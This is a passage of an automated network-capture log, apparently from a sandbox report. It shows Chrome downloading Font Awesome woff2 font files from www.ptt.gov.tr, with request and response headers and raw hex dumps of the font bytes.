                                                                                                                                                                                            2024-09-28 03:39:40 UTC7271INData Raw: 7b 80 1d 98 84 a0 1e ac fc 45 06 67 0a b6 f7 f9 15 f7 02 f8 05 fb 02 07 0e ed f7 72 2b 1d fb 09 fd 4f 5e 1d fb db de aa 3a 0a 0e f7 07 de aa 3a 0a f7 48 fc a1 41 1d 0e f7 07 c9 f9 53 15 95 f7 3f d1 86 0a 98 78 51 27 fb 24 81 88 8d 8a 92 1f f8 61 16 96 f7 3f d1 c4 9d 7d 98 79 50 28 fb 24 81 88 8c 8a 92 1f fc 4c fd 34 3a 0a f7 48 fc a1 41 1d 0e fb db c9 34 1d a0 fd 34 3a 0a 0e fb db f7 0c 87 0a 3d 0a 66 fd 2d 3a 0a 0e fb db 95 2b 1d d4 fd 2d 3a 0a 0e fb db a9 38 1d fb 13 fd 38 3a 0a 0e fb db f7 0c 52 1d 66 fd 38 3a 0a 0e fb db f7 43 f9 52 49 1d 2f fd 33 3a 0a 0e fb db 99 42 0a d0 fd 46 3a 0a 0e fb db ed fb 5b 15 b4 aa a4 0a 7d 8c 1f 7d 83 7e 85 7a 1b 75 7b 9b a3 a8 a2 ac c6 b7 1f 92 90 8f 94 98 1a f8 dd 07 a2 7f 96 76 1e ab 0a fc dd 07 7e 8e 81 94 86 1e 4f
                                                                                                                                                                                            Data Ascii: {Egr+O^::HAS?xQ'$a?}yP($L4:HA44:=f-:+-:88:Rf8:CRI/3:BF:[}}~zu{v~O
                                                                                                                                                                                            2024-09-28 03:39:40 UTC7271INData Raw: 96 74 1b 72 7d 74 87 8d 1f f7 35 fb 6b 05 0e 28 f7 45 fb 54 32 1d 0e 28 f7 39 31 0a 97 fd 79 32 1d 0e 28 f7 15 71 0a 2d 1d bb fd 79 32 1d 0e 28 f7 29 33 0a fb 22 fd 9a 32 1d 0e 28 f7 c3 45 0a fb 12 fd 79 32 1d 0e 20 ae a8 44 1d 20 f7 36 31 0a fb 13 fc 9c 44 1d 20 f7 7b f8 b4 15 44 0a fb 58 fc 97 44 1d 20 f7 7b f8 da 15 4a 0a fb 58 fc bd 44 1d 20 f7 72 fb 66 25 1d 4f 0a 88 f7 92 80 22 0a 88 f7 5b 31 0a c2 fc c4 22 0a 88 f7 a0 f8 b5 15 3e 1d 7d fc c0 22 0a 88 f7 37 71 0a 2d 1d e6 fc c4 22 0a 88 f7 4b 33 0a 28 fc e5 22 0a 88 f7 e5 45 0a 38 fc c4 22 0a 88 f7 3f 42 1d de fc f0 22 0a 88 f8 73 fb 0f 15 7d 83 7d 85 7a 1b 76 7b 9b a2 a7 a0 ab c5 b6 1f 96 8f 92 94 9d 1a f8 4f 07 8d 7e 91 7e 78 79 81 68 87 1e 89 7d 8a 7e 8a 7b 08 be 72 4d b7 35 4e 0a de c4 b3 c7 ad
                                                                                                                                                                                            Data Ascii: tr}t5k(ET2(91y2(q-y2()3"2(Ey2 D 61D {DXD {JXD rf%O"[1">}"7q-"K3("E8"?B"s}}zv{O~~xyh}~{rM5N
                                                                                                                                                                                            2024-09-28 03:39:41 UTC7271INData Raw: 1e fb 20 06 f7 50 f7 c3 05 91 8f 78 a5 6f 1b 7e 7d 83 77 80 1f fb 36 fb ad fb 34 f7 ae 05 9e 82 7d 93 7c 1b 6d 77 71 85 8e 1f f7 51 fb c3 05 fb 20 06 75 83 82 7c 1f 84 07 7b 93 83 a1 1e f7 35 35 fb 35 06 75 83 82 7c 1f 83 07 7c 93 82 a1 1e f7 35 33 06 74 94 7f a0 1e 0e a3 f8 7a f7 54 15 74 53 5d 64 46 86 08 f8 10 07 d0 84 b3 68 a3 58 08 8e 87 b2 97 aa 1a 9a 7c a6 6f a1 1e 6d a3 60 a2 53 90 08 e5 07 a5 7f 94 77 1e 88 06 78 7f 6b 1d 2f 07 fb 11 7b 34 28 fb 1c 1a fb 21 de 2e f7 15 7c 1e 2b 07 72 97 82 9d 1e 8f 06 9f 97 94 a4 1f e9 07 c3 90 b6 a0 a7 a5 08 ac a5 9d a8 9e 1a ac 63 92 88 87 1e fb e9 e4 15 f7 00 c4 d0 e1 99 1e fc 0e 07 35 9b 52 cf f2 1a 0e a3 f8 a3 f7 42 15 f7 0c 27 af 29 a5 1e f7 7e 07 d6 82 bd 64 a2 60 08 8d 89 ac 9b a7 1a a1 75 aa 62 a2 1e 6e
                                                                                                                                                                                            Data Ascii: Pxo~}w64}|mwqQ u|{555u||53tzTtS]dFhX|om`Swxk/{4(!.|+rc5RB')~d`ubn
                                                                                                                                                                                            2024-09-28 03:39:41 UTC7271INData Raw: 2a fb 01 fb 22 1e 0e 15 99 9c 90 97 94 1a 9f 6f 96 88 88 1e 4a 42 05 a9 64 59 9c 52 1b fb 23 27 23 fb 25 47 a1 50 b0 60 1f 66 62 05 7d 7b 86 7f 81 1a 77 a7 7f 8f 8f 1e cb d2 05 6f b1 bc 7b c4 1b f7 21 ef f3 f7 24 ce 76 c5 67 b5 1f fb 4c a3 15 b5 af 7e 73 a8 1f fb 87 fb a3 05 73 ab 7d b4 b9 1a f7 03 d4 d9 f0 1e fc 10 04 62 67 98 a2 6f 1f f7 85 f7 a2 05 a2 6b 98 63 5e 1a fb 02 43 3c 27 1e 0e 1b fb 14 2d 26 fb 28 fb 2a e9 27 f7 12 0b 82 f7 f4 f8 10 15 f7 20 f7 50 05 aa a1 8c bb 4d 1b fb 33 06 fb 25 3a fb 01 fb 32 1f fb f1 07 75 94 7f a1 1e 94 06 9f 97 97 a1 1f f7 f7 07 f3 c1 eb ee 1e f7 19 06 fb 13 fb 3b 05 89 88 76 73 77 1a 73 97 80 aa 80 1e ea 69 c2 6e 39 1a 44 6c 50 33 57 63 a1 b5 78 1e 7e 8a 79 79 76 1a 77 9a 75 a6 79 1e 79 a5 b5 83 b3 1b f7 01 d6 d1 f7
                                                                                                                                                                                            Data Ascii: *"oJBdYR#'#%GP`fb}{wo{!$vgL~ss}bgokc^C<'-&(*' PM3%:2u;vswsin9DlP3Wcx~yyvwuyy
                                                                                                                                                                                            2024-09-28 03:39:41 UTC7271INData Raw: 01 76 00 02 01 7a ff ff 01 7b 00 01 01 c9 ff ff 01 cb 00 01 01 cc ff fc 01 cf 00 01 01 d3 ff ff 01 d4 00 02 01 d5 ff fe 01 d6 00 02 01 d8 00 02 01 e4 00 02 02 1d ff ff 00 07 01 88 ff e2 01 89 ff f2 01 8a ff eb 01 8e ff da 01 c2 ff ec 01 ec ff d8 01 ed ff d1 00 02 01 79 ff f5 01 eb ff d8 00 01 01 eb ff d7 00 04 01 a6 ff ef 01 ac ff e4 01 ef ff e0 01 f0 ff d4 00 05 01 a6 ff ff 01 a9 ff f6 01 ac ff fe 01 ee ff e0 01 f0 ff ff 00 02 01 ee ff de 01 ef ff ff 00 07 01 cb ff ed 01 d1 ff ff 01 d2 ff e8 01 d4 ff e9 01 d5 ff e5 01 d6 ff e9 01 d8 ff eb 00 07 01 cb ff ed 01 d1 ff ff 01 d2 ff e8 01 d4 ff e9 01 d5 ff e5 01 d6 ff e9 01 d8 ff eb 00 07 01 cb ff ed 01 d1 ff ff 01 d2 ff e8 01 d4 ff e9 01 d5 ff e5 01 d6 ff e9 01 d8 ff eb 00 07 01 cb ff ed 01 d1 ff ff 01 d2 ff
                                                                                                                                                                                            Data Ascii: vz{y
                                                                                                                                                                                            2024-09-28 03:39:41 UTC7271INData Raw: b6 ff fe 00 b7 ff fe 00 b8 ff fe 00 b9 ff fe 00 ba ff fe 00 bc ff fe 00 bd ff fe 00 be ff fe 00 bf ff fe 00 c0 ff fe 00 c1 ff fe 00 c2 ff fe 00 c3 ff e0 00 c4 ff fe 00 c5 ff fe 00 c6 ff fe 00 c7 ff fe 00 c8 ff fe 00 c9 ff fe 00 ca ff fe 00 cb ff fe 00 cc ff fe 00 cd ff fe 00 ce ff fe 00 cf ff fe 00 d0 ff d9 00 d2 ff fe 00 d3 ff fe 00 d4 ff fe 00 d5 ff fe 00 d6 ff fe 00 d8 00 09 00 db ff e0 00 dd 00 25 00 de 00 1d 00 df 00 24 00 e1 00 01 00 e4 00 32 00 e6 00 2c 00 e8 ff e0 00 ea 00 15 00 f3 ff f6 00 f4 ff ff 00 f5 ff ff 00 f6 ff ff 00 f7 ff ff 00 f8 ff ff 00 f9 ff ff 00 fa ff ff 00 fb ff fe 00 fc ff fe 00 fd ff fe 00 fe ff fe 00 ff ff fe 01 00 ff fe 01 01 ff fe 01 02 ff fe 01 03 ff fe 01 04 ff fe 01 05 ff fe 01 06 ff fe 01 07 ff ff 01 09 ff fe 01 0a ff ff
                                                                                                                                                                                            Data Ascii: %$2,
                                                                                                                                                                                            2024-09-28 03:39:41 UTC7271INData Raw: 01 d1 ff f4 01 e4 00 01 02 1d ff ff 02 23 00 01 00 f5 00 01 ff fd 00 02 ff fd 00 03 ff fd 00 04 ff fd 00 05 ff fd 00 06 ff fd 00 07 ff fd 00 08 ff fd 00 09 ff fd 00 0a ff fd 00 0b ff fd 00 0c ff fd 00 0d ff fd 00 0f ff ff 00 10 ff ff 00 11 ff ff 00 12 ff ff 00 13 ff ff 00 14 ff ff 00 24 ff ff 00 25 ff ff 00 26 ff ff 00 27 ff ff 00 28 ff ff 00 38 ff fb 00 39 ff fb 00 3a ff fb 00 4a ff ff 00 4b ff ff 00 4c ff ff 00 4d ff ff 00 4e ff ff 00 4f ff ff 00 50 ff ff 00 51 ff ff 00 52 ff ff 00 53 ff ff 00 54 ff ff 00 55 ff ff 00 58 ff ff 00 5d ff ff 00 5e ff ff 00 5f ff ff 00 60 ff ff 00 61 ff ff 00 62 ff ff 00 63 ff f2 00 64 ff f3 00 85 ff fd 00 86 ff fd 00 8a ff ff 00 8b ff ff 00 8c ff ff 00 8d ff ff 00 8e ff ff 00 ae ff fe 00 af ff fe 00 b0 ff fe 00 b1 ff fe 00
                                                                                                                                                                                            Data Ascii: #$%&'(89:JKLMNOPQRSTUX]^_`abcd
                                                                                                                                                                                            2024-09-28 03:39:41 UTC7271INData Raw: cd ff fe 01 cf 00 02 01 d1 ff fc 01 e4 00 02 02 1d ff db 02 23 00 0b 00 13 00 c3 ff eb 00 d0 ff ff 00 d8 00 02 00 de 00 02 00 df 00 03 00 e4 00 01 00 e6 00 02 00 ea 00 01 01 5c 00 01 01 73 ff e4 01 7a ff e9 01 c9 ff ff 01 cb 00 02 01 cd ff fe 01 cf 00 02 01 d1 ff fc 01 e4 00 02 02 1d ff db 02 23 00 0b 00 13 00 c3 ff eb 00 d0 ff ff 00 d8 00 02 00 de 00 02 00 df 00 03 00 e4 00 01 00 e6 00 02 00 ea 00 01 01 5c 00 01 01 73 ff e4 01 7a ff e9 01 c9 ff ff 01 cb 00 02 01 cd ff fe 01 cf 00 02 01 d1 ff fc 01 e4 00 02 02 1d ff db 02 23 00 0b 00 0a 00 73 ff e0 01 2c ff f9 01 cb ff ef 01 cf ff f1 01 d2 ff ee 01 d4 ff ea 01 d6 ff ea 01 d8 ff eb 01 e4 ff fe 02 23 ff e6 00 0a 00 73 ff e0 01 2c ff f9 01 cb ff ef 01 cf ff f1 01 d2 ff ee 01 d4 ff ea 01 d6 ff ea 01 d8 ff eb
                                                                                                                                                                                            Data Ascii: #\sz#\sz#s,#s,


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            119192.168.2.549846185.220.152.264432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:40 UTC623OUTGET /_next/static/media/fa-solid-900.ce4938a3.woff2 HTTP/1.1
                                                                                                                                                                                            Host: www.ptt.gov.tr
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            Origin: https://www.ptt.gov.tr
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: font
                                                                                                                                                                                            Referer: https://www.ptt.gov.tr/_next/static/css/fdc30eafd5b8da2a.css
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:40 UTC351INHTTP/1.1 200 OK
                                                                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                                                                            Keep-Alive: timeout=5
                                                                                                                                                                                            Content-Type: font/woff2
                                                                                                                                                                                            Last-Modified: Thu, 12 Sep 2024 09:54:30 GMT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            ETag: W/"26350-191e5a7dff0"
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:40 GMT
                                                                                                                                                                                            Content-Length: 156496
                                                                                                                                                                                            Strict-Transport-Security: max-age=15552000; includeSubDomains; preload
                                                                                                                                                                                            2024-09-28 03:39:40 UTC6920INData Raw: 77 4f 46 32 00 01 00 00 00 02 63 50 00 0a 00 00 00 06 1a 05 00 02 63 04 03 05 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 36 02 24 04 20 06 60 03 ab 3c 00 81 91 02 ca 96 c2 20 cb ab 40 05 87 6d 07 20 25 02 0d 93 d6 01 d0 1a 56 27 00 00 aa bf 8d 87 11 29 9a 3d 3c 45 e4 ac d7 03 a0 aa aa aa aa aa a6 25 04 1c d7 b6 bd aa 0a 00 08 7e f4 93 9f fd e2 57 bf f9 dd 1f fe e4 cf fe e2 af fe e6 ef fe e1 9f fe e5 df fe e3 bf fe e7 ff fe 53 60 30 ee fe 81 30 2d db 71 b9 3d 5e 9f df f0 2f 3f f6 7a 6e 0a 44 6f 2c 1c 70 46 a4 d0 81 42 f2 19 38 54 72 aa fe f9 1a 35 a1 db 6e fb 18 ff 51 97 3e cb be 00 a0 74 3a bf 9f 94 51 c5 09 98 53 e4 1d 01 d6 74 eb d8 ac 65 56 19 8d fc 9f 8a 29 e5 60 a2 49 67 62 22 ad b6 a8 98 bf dc 22 5a 49 32 7d 01 2c b2 83 aa
                                                                                                                                                                                            Data Ascii: wOF2cPc6$ `< @m %V')=<E%~WS`00-q=^/?znDo,pFB8Tr5nQ>t:QSteV)`Igb""ZI2},
                                                                                                                                                                                            2024-09-28 03:39:40 UTC7271INData Raw: f1 10 34 0f e2 61 68 16 c4 23 d0 7c 88 47 a1 d9 10 8f 41 0b 20 1e 87 16 42 3c 01 ed 00 f1 a4 84 fc 05 a1 45 10 6f 43 1f 42 bc 03 3f 11 e2 23 29 97 f9 c7 22 7d 07 f1 09 d2 1a 88 7f a1 1c 62 3e d2 27 10 0b e0 7f 40 ac 45 d6 1d 62 03 d2 57 10 9b 6b 5f 78 69 b9 61 01 a8 25 6f 84 7b 52 a1 78 9e 82 98 67 42 67 40 51 1b ea 0e 45 1d a4 df a1 a8 0b cf a0 a8 07 af 03 45 43 f8 04 28 1a 23 ed 0f 45 13 a4 fd a0 68 0a bb 0e 8a 66 62 de 5c d8 f5 50 b4 10 f3 f6 22 3d 04 45 19 e9 43 28 7a 83 0c 8a 71 f0 21 e8 21 dd e5 c4 7c 15 65 bb f9 6a a2 b3 00 dd b5 61 1c dd 75 24 e4 eb 3a ff 7f ee d5 dd f5 95 90 6f 23 d2 89 74 cf 85 01 74 cf 43 fa 98 ee f9 e8 7c c1 8c f3 a0 b3 39 33 ce 8b ce 66 cc 3c 1c 9d 35 99 79 12 74 8e 66 e6 49 c5 7c 5a 91 d7 62 e6 35 46 48 27 51 f5 a7 1a 80 39
                                                                                                                                                                                            Data Ascii: 4ah#|GA B<EoCB?#)"}b>'@EbWk_xia%o{RxgBg@QEEC(#Ehfb\P"=EC(zq!!|ejau$:o#ttC|93f<5ytfI|Zb5FH'Q9
                                                                                                                                                                                            2024-09-28 03:39:40 UTC7271INData Raw: fe fb 06 32 ed d5 e5 f6 ff 08 13 78 1b da fc b2 04 4c 34 a6 36 ce 13 95 70 dd 8d 59 26 81 5c 67 53 9a c9 c5 f7 96 87 c1 af ba e1 e2 b7 60 2b 8c c3 27 ca 73 25 9c 5d fc ed f5 97 4c 94 d7 87 c3 8c 0b d7 46 19 ed ae 80 8f 61 ad 66 c4 8f d4 2e 91 44 de 0a fc f5 ac f4 7c a7 d7 53 59 a6 7a bd 9d a5 c3 9f c3 da fa 70 74 fa f4 68 b8 be 06 1f 87 1c 65 aa 57 6c 6f 17 c7 55 be cd 66 7a 76 30 68 af af b7 07 83 b3 af c6 68 b7 17 9a a2 36 3a 8e 13 8e 11 4d 1e d4 73 46 7a 90 0f 64 7b 9a 41 45 62 93 a4 47 39 b7 6a 7c 74 74 94 d9 e9 11 50 24 ed 28 29 c3 c1 f9 ac 38 aa b3 38 2d f8 22 fc ba 1e 5b 31 46 a8 f6 87 1f a5 ab 5a dd ba 53 f0 62 2e 71 89 d3 2c 37 69 97 68 d3 32 bf 4d 39 c6 7b 7b 87 bb f9 25 0f 20 f0 39 a7 f7 69 df c4 b3 a0 39 3a fc e9 1d 74 31 1e f5 f7 cf 8e cf da
                                                                                                                                                                                            Data Ascii: 2xL46pY&\gS`+'s%]LFaf.D|SYzptheWloUfzv0hh6:MsFzd{AEbG9j|ttP$()88-"[1FZSb.q,7ih2M9{{% 9i9:t1
                                                                                                                                                                                            2024-09-28 03:39:40 UTC7271INData Raw: cd 1c 4b 58 06 56 ff 64 b1 21 24 34 29 29 1c d3 41 12 41 b2 a5 ba 5d 9b 9f 53 75 5d bd e3 09 57 48 0f 0b fa 9e be d2 bd e5 1e fb cf 77 e5 67 28 bd f3 9d f3 75 75 48 e9 9d 4f 6b 46 58 fb a5 c1 78 cf 75 f2 8b ac a4 2a 21 94 b9 2a 6c 94 7c b5 3a d9 7e 89 c1 d2 c6 8f 08 b7 15 47 4c a3 6b 10 72 32 8a b8 1f c8 67 39 83 b6 2d 95 13 ec 34 2b e2 e6 d4 2e 74 e2 e8 a8 9a fe 4b d5 75 75 f0 f4 c1 91 66 9a 25 0e cb 83 af 16 45 00 8e a8 5d 27 fd cf 19 f8 2a a5 03 c7 b3 7c f4 95 79 e5 57 8e 1e c7 e8 60 fc dc c2 0a 31 10 82 22 4f b2 d6 8b fe 53 cd 8c fa d5 e8 7a f4 ea 7c c8 48 66 43 c2 9f f7 96 f4 22 eb d0 38 56 8f ef 7d 10 28 d4 5c 91 a4 51 1a 24 51 92 8d a9 e7 29 6b d7 ed 4b 59 4f 77 6a bd 82 a7 5d 53 f6 0b 7b 5c 49 f5 5d bf dc 75 87 71 9e e7 61 78 dd b9 73 e7 f4 4d 5d
                                                                                                                                                                                            Data Ascii: KXVd!$4))AA]Su]WHwg(uuHOkFXxu*!*l|:~GLkr2g9-4+.tKuuf%E]'*|yW`1"OSz|HfC"8V}(\Q$Q)kKYOwj]S{\I]uqaxsM]
                                                                                                                                                                                            2024-09-28 03:39:40 UTC7271INData Raw: f6 3e e7 33 1c e7 9b e6 70 ab 67 3c d8 21 3f 68 6c 3e 3a 28 87 cc 2b 77 1f 75 14 50 fe cf 1a 60 3c 1d 51 e6 9d 44 61 cc ef 46 04 23 54 42 a7 e5 de e7 bd 03 bd 0f 21 69 74 0e 1f 05 a0 8d 41 98 d9 0b fc 20 8e 83 98 14 83 d2 5f ce 92 ff 72 9b ab f8 b7 19 5f 71 0d 52 2d e5 38 43 9d a1 d1 8f 3a 7f 20 10 e6 d8 05 99 44 65 95 64 2c e1 57 13 f8 04 d0 a1 9d 3b 27 1b 8d c9 9d 3b 0f 6d fd 7a 59 8c e3 58 55 4d ae eb 44 24 92 64 46 82 20 69 8e c3 24 41 d2 09 13 64 22 a8 22 b1 29 d5 74 4f 67 45 51 d8 eb fb 3e 11 05 56 a5 64 96 01 66 b1 67 94 c0 30 05 5a 0e 6a c0 57 15 45 11 39 97 15 41 e7 b2 1b 86 21 63 aa fa e2 ce 72 a8 37 76 ed de bf 7f f7 ae 46 1d b6 7f f5 7f 49 d7 75 51 14 25 59 d2 65 d3 34 14 0b 0b 84 03 70 59 02 ac 1a 22 29 31 1a 30 83 6b 86 45 4c 8c 7f 3f 08 02
                                                                                                                                                                                            Data Ascii: >3pg<!?hl>:(+wuP`<QDaF#TB!itA _r_qR-8C: Ded,W;';mzYXUMD$dF i$Ad"")tOgEQ>Vdfg0ZjWE9A!cr7vFIuQ%Ye4pY")10kEL?
                                                                                                                                                                                            2024-09-28 03:39:41 UTC7271INData Raw: 53 31 40 19 ae 15 d8 f0 0a db 12 7e c7 d0 02 ff a4 a6 cd 2e 54 aa 12 e3 e0 38 5f bd f1 3f eb fa 27 2e 96 6d 1b 16 f7 2a d4 15 62 be af 9f d3 2e 18 57 c3 be 8b 56 d1 3a 7a 35 42 d0 5d 8b 26 f9 97 45 7a 8e 51 f4 a4 51 c4 b7 1c e9 66 5b e3 e9 52 3a 5a 3a af 03 49 92 d4 95 4a 21 c6 4e aa b0 81 33 28 c5 bc fd 57 08 fe 5d 73 6c f2 84 20 dc 64 eb 4c bf e6 30 2b 14 c2 b0 50 50 7b c7 0d a2 3a 37 49 d2 1e 85 1b e6 ad 00 80 75 d1 75 45 fd 57 c7 c7 61 a4 96 28 2a 37 23 e1 d6 e4 e3 07 ec cb a6 c2 dc f1 6f 09 62 a6 70 cb b8 a6 62 d9 b6 55 59 d6 1c 53 ac 4a f2 ed 96 ae 69 eb f0 5e 17 63 f7 3d 50 1c 1f ab 8d 25 18 2d 45 82 d6 23 41 b8 6b d2 5f e9 8a 1c 66 f0 a4 ae 46 bc 14 f8 1e 14 97 7d b2 8a 0c 38 37 49 3d f9 78 bd 5e 17 24 1c 21 09 a8 3c 27 1a 16 08 04 e7 41 c8 55 29
                                                                                                                                                                                            Data Ascii: S1@~.T8_?'.m*b.WV:z5B]&EzQQf[R:Z:IJ!N3(W]sl dL0+PP{:7IuuEWa(*7#obpbUYSJi^c=P%-E#Ak_fF}87I=x^$!<'AU)
                                                                                                                                                                                            2024-09-28 03:39:41 UTC7271INData Raw: 16 80 65 5b b0 33 4e 77 fd 64 3c ea 7a ce 93 ba 05 3d c7 c0 ec c9 02 0a 06 ab e0 46 88 1a 70 23 6e cf 23 9e 6f 19 2b 70 70 fc 22 66 91 f1 bd 19 6f 25 9a 46 da 6f 62 ae cb fe 80 82 61 16 20 f4 07 30 7c 3c 04 cb 2a 59 c6 1f 30 76 ea 87 cf 6b c1 b3 dc 2c 98 46 0e c6 ea fb e0 db e8 cc 0a 3f 84 d0 60 4f 89 dd 78 06 71 0e 49 b0 3e 95 2a 2b 58 93 71 42 12 43 e1 9a 64 3a 62 b4 93 34 51 0b c3 f2 cd e7 23 8e 21 23 59 9a 04 49 84 4d 3a 31 51 37 74 22 0b c5 bb 89 e2 fb 0a 7f 2b f6 7d 9c 21 05 83 b1 25 bc 84 4f ec bf ac bc af 74 ac 33 0d 97 97 04 8d e9 46 dd 34 95 99 f1 37 18 63 1b ec ed f0 96 d0 34 15 51 64 4c bf 2e d4 fe 52 1c 49 97 0c 8c 7f 26 f8 7f f0 97 cc 93 c7 9c 0f 7e 74 fd 55 3a 91 05 51 2d 4f d4 7f 69 fc 48 18 86 a1 af bd fd b6 f0 00 ce 23 0d d9 28 41 97 a3
                                                                                                                                                                                            Data Ascii: e[3Nwd<z=Fp#n#o+pp"fo%Foba 0|<*Y0vk,F?`OxqI>*+XqBCd:b4Q#!#YIM:1Q7t"+}!%Ot3F47c4QdL.RI&~tU:Q-OiH#(A
                                                                                                                                                                                            2024-09-28 03:39:41 UTC7271INData Raw: 4d 9b 54 bc c3 94 6d 3e ec 38 e7 19 2e 5c 16 e2 5d e5 cb 38 28 60 76 de e9 f5 7a bb 05 99 02 f4 6c 73 4d d3 d6 4c db d0 27 1f f2 31 f6 1f 9a d4 8d 80 f3 01 d1 55 36 20 e7 f6 96 86 3a 19 8c bf ff 90 0c f4 1c b2 0f b8 24 87 ef a3 59 74 25 f2 81 32 aa 97 51 1c 43 2e 89 9c 44 f5 92 8d 82 e0 06 a8 30 10 27 50 7e b1 30 be 70 14 4a 3b 8b a9 3c 77 f8 3b db d4 8d c6 f8 9e ba a1 9b 76 4f 51 7a b6 a9 1b 75 78 6a 5e f0 e5 44 d6 b0 4a 0d 80 8d 9f 1f 50 59 38 40 dd 5d a6 41 29 14 30 3b 0f 5f d7 0d db ac 56 4d db d0 f1 a7 f3 7e 0e 3e 96 dc 37 d4 60 8c 52 7e 8e 82 fc b8 05 8c 19 43 4d 19 a4 93 70 29 e9 ea a4 0e 6d 72 e9 5e ff 45 d1 8a eb 49 16 a4 b1 e0 c1 a4 4d be b6 e6 ba 08 3b 7d ea 1a 8d 74 fc de fa 8b 09 2c 7a ff a7 1a b8 6e 0d 8b ea a7 76 2a 6d 34 a0 fa 48 f2 5a 90
                                                                                                                                                                                            Data Ascii: MTm>8.\]8(`vzlsML'1U6 :$Yt%2QC.D0'P~0pJ;<w;vOQzuxj^DJPY8@]A)0;_VM~>7`R~CMp)mr^EIM;}t,znv*m4HZ
                                                                                                                                                                                            2024-09-28 03:39:41 UTC7271INData Raw: 6a 5e b8 f5 6e b6 40 87 19 55 18 fe 98 f0 b0 91 47 96 2d c7 a4 cf b9 f3 7e 6c 8f 9c c5 5b 26 f9 fe fe ed 7f bd 17 f2 fb 51 21 b7 10 6b 42 51 d5 c5 7f 4c f7 56 1d a3 91 1e 48 d9 67 3a 1a e2 d1 ba d7 91 a8 99 7b 9d 14 8c 0b 86 28 18 f5 5b 2e 2d fc c5 e0 9e aa 7a 92 4a 12 80 24 d1 93 57 1c 92 ef ce 48 d9 af 7a 85 a7 35 ed a8 c8 f3 ca 87 15 9e 17 8f ca 9d 79 f2 e5 ed 7b cb 87 20 51 96 0f 22 07 d9 a4 5a e6 9c d9 30 38 79 f2 eb 47 41 55 bf ff e5 8f 1e 85 2f ee 60 14 a8 a7 30 40 f9 9a 5b 3a 0a 79 a6 46 ee a2 d8 75 49 cd e7 19 49 dc f5 51 85 dc 52 ea 5a c3 4b 06 0c 6b f5 19 8c f5 0c 53 3f 77 b4 bd ee 0d 01 9a a2 f6 36 b2 29 95 53 d9 1c 98 72 4a a5 fa 30 f3 e5 e8 76 8b 23 dd 51 05 82 4e 7c f1 67 6a 44 f4 35 58 ba d2 e0 d0 8b ee 63 c0 79 f3 60 43 52 35 72 bc 20 29
                                                                                                                                                                                            Data Ascii: j^n@UG-~l[&Q!kBQLVHg:{([.-zJ$WHz5y{ Q"Z08yGAU/`0@[:yFuIIQRZKkS?w6)SrJ0v#QN|gjD5Xcy`CR5r )
                                                                                                                                                                                            2024-09-28 03:39:41 UTC7271INData Raw: 3f 13 04 95 f9 f9 ca 79 aa 28 54 92 ce b7 f7 ee 6d b7 5a cf d4 96 96 6a 61 b8 e5 97 4a be eb 0e 97 bf f4 43 59 56 d5 2d db 86 5b 6c b0 9e a9 cc cf 57 82 e0 bc 24 51 45 a1 e7 5b ad f6 de bd ed 67 c2 b0 b6 b4 54 db 72 5d bf 54 f2 87 3f ee 64 a8 aa b2 bc 65 e7 f3 36 c2 97 fd a3 8a a8 e3 f0 ea b0 e0 c2 84 a5 ec 36 b6 dc 87 be 7b b1 a9 41 5b c0 35 1e c7 be d2 2e fc 0b d2 96 67 08 db 27 2b ee f1 fe a5 60 5f 69 8f 99 b9 81 45 55 b4 3e b4 ef ed f2 f9 50 a3 c8 fc 41 45 bd 79 04 82 21 1c 2f a6 41 05 bf c2 5e 10 8f b6 1e dc 45 3d 08 6c 09 fd dc d7 bc f3 ba 00 7f c9 7b f5 52 b6 0f 89 f7 b8 91 f9 f0 c5 2a aa ca ec 21 a8 b1 6b d3 d1 43 94 54 d9 ed a5 58 92 27 9b 84 78 16 40 9e 72 69 ab 57 8e 83 c7 2c da 64 bf e7 46 c5 c3 d5 a3 27 0f 5a f5 44 9b 65 90 9e 09 9f 1b 31 0f
                                                                                                                                                                                            Data Ascii: ?y(TmZjaJCYV-[lW$QE[gTr]T?de66{A[5.g'+`_iEU>PAEy!/A^E=l{R*!kCTX'x@riW,dF'ZDe1


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            120192.168.2.549850185.220.152.264432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:40 UTC624OUTGET /_next/static/media/fa-brands-400.e465758e.woff2 HTTP/1.1
                                                                                                                                                                                            Host: www.ptt.gov.tr
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            Origin: https://www.ptt.gov.tr
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: font
                                                                                                                                                                                            Referer: https://www.ptt.gov.tr/_next/static/css/fdc30eafd5b8da2a.css
